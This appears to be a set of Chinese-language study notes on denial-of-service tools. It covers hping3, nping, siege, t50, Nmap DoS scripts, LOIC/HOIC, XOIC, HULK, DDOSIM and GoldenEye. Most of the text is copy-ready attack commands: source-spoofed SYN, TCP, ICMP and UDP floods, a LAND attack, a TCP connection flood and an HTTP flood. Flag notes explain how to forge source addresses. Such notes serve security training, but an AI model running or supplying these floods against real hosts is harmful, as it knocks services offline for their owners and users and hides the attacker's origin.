RUDY(Are You Dead Yet?)
- 慢速应用层HTTP POST攻击,与slowhttptest原理相同
- 每次只传输一个字节的数据
- 攻击有表单WEB页面,攻击时需指定攻击的参数名称
- https://sourceforge.net/projects/r-u-dead-yet/
- 美剧“黑客军团”中提到此攻击手段
- 必须是POST请求,页面中必须要有表单
Hping3
几乎可以定制发送任何TCP/IP数据包,用于测试FW、端口扫描、性能测试
Syn Flood攻击
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1
hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1
TCP Flood攻击
hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1
ICMP Flood攻击
hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2
UDP Flood攻击
hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2
LAND攻击
- 源地址和目的地址都是受害者,受害者与自己完成三次握手,或者不同端口相互循环应答。
hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1
参数:
- -a 伪造源地址
- -s 源端口
- -d 数据段字节
- -p 目标端口
Nping
nmap 的组件之一
TCP全连接DoS攻击
nping --tcp-connect --rate=10000 -c 10000000000 -q 1.1.1.1
查公网IP
nping --echo-client "public" echo.nmap.org --udp
- 传“public”字符到echo.nmap.org,会返回自己的公网IP
Siege
http/https 压力测试工具,模拟多个用户并发访问请求
siege -g http://1.1.1.1/a.php / 1.1.1.1
siege -i -c 1000 http://1.1.1.1/a.php -A siegehttp
同时攻击多个url,使用-f调用字典文件
- /etc/siege/urls.txt
参数:
- -i:三种方式之一,internet
- -A:UserAgent
- -c:并发用户数
T50
网络压力测试
t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80
t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 80
Nmap
grep dos /usr/share/nmap/script/script.db|cut -d "\" -f 2
nmap -p445 --script=xxxx 1.1.1.1
匿名者发布的DoS工具
- LOIC
- HOIC
- DDoSer
- 招募志愿者,发放以上工具
- 以上DoS工具不隐藏真实IP地址
XOIC
- 攻击任意IP地址的指定端口
- github
- 三种模式:test、normal、DoS Attack
- 支持协议:TCP/HTTP/UDP/ICMP
HULK(Http Unbearable Load King)
- Python脚本
- 随机产生大量唯一的地址请求,避免缓存命中
- 耗尽WEB服务器资源池
DDOSIM
- 7层拒绝服务工具(模拟多个僵尸机)
- 随机IP地址
- 基于TCP连接的攻击
- 应用层DDoS攻击
- 正常的HTTP请求、非正常的HTTP请求式DDoS
- SMTP DDoS
- 随机端口的TCP连接洪水
GoldenEye
- http/https拒绝服务攻击工具
- 安全研究为目的的Python脚本
- 随机攻击向量,keep-alive,避免缓存命中
./goldeneye.py http://1.1.1.1 -w 50